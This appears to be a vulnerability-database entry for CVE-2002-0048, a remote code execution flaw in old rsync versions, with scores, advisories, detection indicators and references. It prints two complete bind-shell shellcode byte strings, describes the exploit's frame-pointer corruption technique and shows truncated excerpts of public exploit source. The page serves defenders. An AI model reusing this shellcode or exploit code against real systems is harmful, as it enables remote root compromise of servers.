CVE-2002-0048
Published 2002-02-27
Priority: P3 · 47 · critical · CVSS 2.0 score 10.0
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT (public exploit code is listed in the Exploit-DB entries below)
EPSS: 34.02% (98.2nd percentile)
Multiple signedness errors (mixed signed and unsigned numbers) in the I/O functions of rsync 2.4.6, 2.3.2, and other versions allow remote attackers to cause a denial of service and execute arbitrary code in the rsync client or server.
Affected
9 ranges listed, all for the same vendor/product; no version bounds or fixed-in versions were extracted.
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| andrew_tridgell | rsync | — | — |
Detection & IOCs (extracted from sources)
Bytes (shellcode signature 1):
\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x43\xeb\x43\x5e\x31\xc0\x31\xdb\x89\xf1\xb0\x02\x89\x06\xb0\x01\x89\x46\x04\xb0\x06\x89\x46\x08\xb0\x66\xb3\x01\xcd\x80\x89\x06\xb0\x02\x66\x89\x46\x0c\xb0\x77\x66\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0\x66\xb3\x02\xcd\x80\xeb\x04\xeb\x55\xeb\x5b\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\xb3\x05\xcd\x80\x88\xc3\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80\xb0\x3f\xb1\x02\xcd\x80\xb8\x2f\x62\x69\x6e\x89\x06\xb8\x2f\x73\x68\x2f\x89\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x5b\xff\xff\xff
Bytes (shellcode signature 2):
\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\xcd\x80\x85\xc0\x74\x05\x93\x31\xdb\xcd\x80\xb0\x42\xcd\x80\x31\xc0\xb0\x06\x31\xdb\xb3\x03\x50\xcd\x80\x58\x4b\x79\xf9\xb0\x30\x43\xb3\x0f\x31\xc9\x41\x50\xcd\x80\x58\x80\xe3\x03\x4b\x75\xf6\x43\xb0\x66\x89\xe1\x50\xcd\x80\x92\x43\x6a\x10\x8d\x7c\x24\x04\x57\x52\xb8\x02\xff\x0b\x1a\xfe\xc4\xab\x31\xc0\xab\xb0\x66\x89\xe1\x50\xcd\x80\x85\xc0\x78\x4e\x58\xb3\x04\x6a\x05\x52\x89\xe1\x50\xcd\x80\x31\xc0\xb0\x06\xcd\x80\x58\x31\xdb\xb0\x66\xb3\x05\x31\xc9\x51\x51\x52\x89\xe1\x50\xcd\x80\x85\xc0\x78\x28\x93\x31\xc0\x40\x40\xcd\x80\x85\xc0\x75\xda\x87\xda\xb0\x06\xcd\x80\x87\xda\xb0\x29\xcd\x80\xb0\x29\xcd\x80\x31\xc0\xb0\x06\x31\xdb\xb3\x03\xcd\x80\x58\xeb\x1d\x31\xc0\x31\xdb\x40\xcd\x80\x5b\x31\xc0\x88\x43\x07\x8d\x4b\x08\x89\x19\x89\x41\x04\xb0\x0b\x31\xd2\xcd\x80\xeb\xe3\xe8\xe5\xff\xff\xff/bin/sh
- Exploit targets rsync daemons running protocol version < 26 (rsyncd version string). A connecting client sending the '@RSYNCD: 26' banner to a vulnerable server (protocol version < 26) is a strong exploit indicator.
- The exploit sends a negative (signed) integer value over the rsync socket to trigger the signedness bug; monitor for abnormally large or negative length values in rsync I/O traffic on TCP/873.
- Post-exploitation shellcode opens a bind shell on TCP port 30464; detect unexpected listening services on port 30464 on rsync servers.
- The exploit sends a crafted oversized path buffer (up to MAXPATHLEN=4096 bytes) in the rsync module request to corrupt the saved stack frame pointer via a NULL byte write.
- The exploit requires the rsync server to have chroot disabled (chroot=false in rsyncd.conf) to be exploitable for arbitrary code execution.
- The vulnerability is exploitable only when the rsync daemon has chroot disabled in its configuration; enabling chroot mitigates arbitrary code execution.
- Affected versions include rsync 2.3.2, 2.4.6, 2.5.0, and 2.5.1; rsync protocol versions below 26 are targeted by the public exploits.
CVSS provenance
- NVD (CVSS v2.0): 10.0 CRITICAL, AV:N/AC:L/Au:N/C:C/I:C/A:C
- vendor_redhat: 10.0 CRITICAL
GHSA
GHSA-cmff-ch37-hx8m · ghsa_unreviewed · 2022-05-03 · severity HIGH
Multiple signedness errors (mixed signed and unsigned numbers) in the I/O functions of rsync 2.4.6, 2.3.2, and other versions allow remote attackers to cause a denial of service and execute arbitrary code in the rsync client or server.
Red Hat
security flaw · vendor_redhat · 2002-01-25 · CVSS 10.0 CRITICAL
Multiple signedness errors (mixed signed and unsigned numbers) in the I/O functions of rsync 2.4.6, 2.3.2, and other versions allow remote attackers to cause a denial of service and execute arbitrary code in the rsync client or server.
No detection rules found.
Exploit-DB
rsync 2.3/2.4/2.5 - Signed Array Index Remote Code Execution · exploitdb · 2002-01-25
---
// source: https://www.securityfocus.com/bid/3958/info
A vulnerability exists within some versions of rsync. Under some circumstances, a remotely supplied signed value is used as an array index, allowing NULL bytes to be written to arbitrary memory locations. Exploitation of this vulnerability could lead to corruption of the stack, and possibly to execution of arbitrary code as the root user.
It is possible that other versions of rsync share this vulnerability.
/*
* linux rsync = MAXPATHLEN
* read_sbuf will in turn do a buf[len] = 0; (without performing any reads)
* we can modify read_sbuf's saved frame pointer by putting a 0 in the LSB.
* When read_sbuf exits the stack pointer will be set to the modified value
* we
Exploit-DB
rsync 2.5.1 - Remote (1) · exploitdb · 2002-01-01
---
/*** 7350fuqnut - rsync
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define MAXPATHLEN 4096
#define VERSION "@RSYNCD: 26\n"
#define PORT 873
#define NULL_OFFSET -48
#define STARTNULLBRUTE -44
#define ENDNULLBRUTE -56
#define BRUTEBASE 0xbfff7777
#define INCREMENT 512
#define ALLIGN 0 /* pop byte allignment */
#define SEND "uname -a; id\n"
int open_s(char *h, int p);
int setup(int s);
int exploit(int s);
void quit(int s); /* garbage quit */
void handleshell(int closeme, int s);
void usage(char *n);
char chode[] = /* Taeho oh, port 30464 */
"\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x43\xeb\x43\x5e\x31\xc0"
"\x31\xdb\x89\xf1\xb0\x02\x89\x06\xb0\x01\x89\x46\x04\xb0\x06"
"\x89\x46\x08\xb0\x66\xb3\x01\xcd\x80\x89\x06\xb0\x02\x
Exploit-DB
rsync 2.5.1 - Remote (2) · exploitdb · 2002-01-01
---
/* 7350rsync - rsync
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define MAXPATHLEN 4096
#define VERSION "@RSYNCD: 26\n"
#define PORT 873
#define NULL_OFFSET -48
#define STARTNULLBRUTE -44
#define ENDNULLBRUTE -56
#define BRUTEBASE 0xbfff7777
#define INCREMENT 512
#define ALLIGN 0 /* pop byte allignment */
#define SEND "uname -a; id\n"
int open_s(char *h, int p);
int setup(int s);
int exploit(int s);
void quit(int s); /* garbage quit */
void handleshell(int closeme, int s);
void usage(char *n);
char linux_port[] = /* x86 linux portshell 30464 */
"\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x43\xeb\x43\x5e\x31\xc0"
"\x31\xdb\x89\xf1\xb0\x02\x89\x06\xb0\x01\x89\x46\x04\xb0\x06"
"\x89\x46\x08\xb0\x66\xb3\x01\xcd\x80\x
References
- ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-02:10.rsync.asc
- http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000458
- http://lists.suse.com/archives/suse-security-announce/2002-Jan/0003.html
- http://marc.info/?l=bugtraq&m=101223214906963&w=2
- http://marc.info/?l=bugtraq&m=101223603321315&w=2
- http://online.securityfocus.com/advisories/3839
- http://www.caldera.com/support/security/advisories/CSSA-2002-003.0.txt
- http://www.debian.org/security/2002/dsa-106
- http://www.iss.net/security_center/static/7993.php
- http://www.kb.cert.org/vuls/id/800635
- http://www.linux-mandrake.com/en/security/2002/MDKSA-2002-009.php
- http://www.linuxsecurity.com/advisories/other_advisory-1853.html
- http://www.redhat.com/support/errata/RHSA-2002-018.html
- http://www.securityfocus.com/bid/3958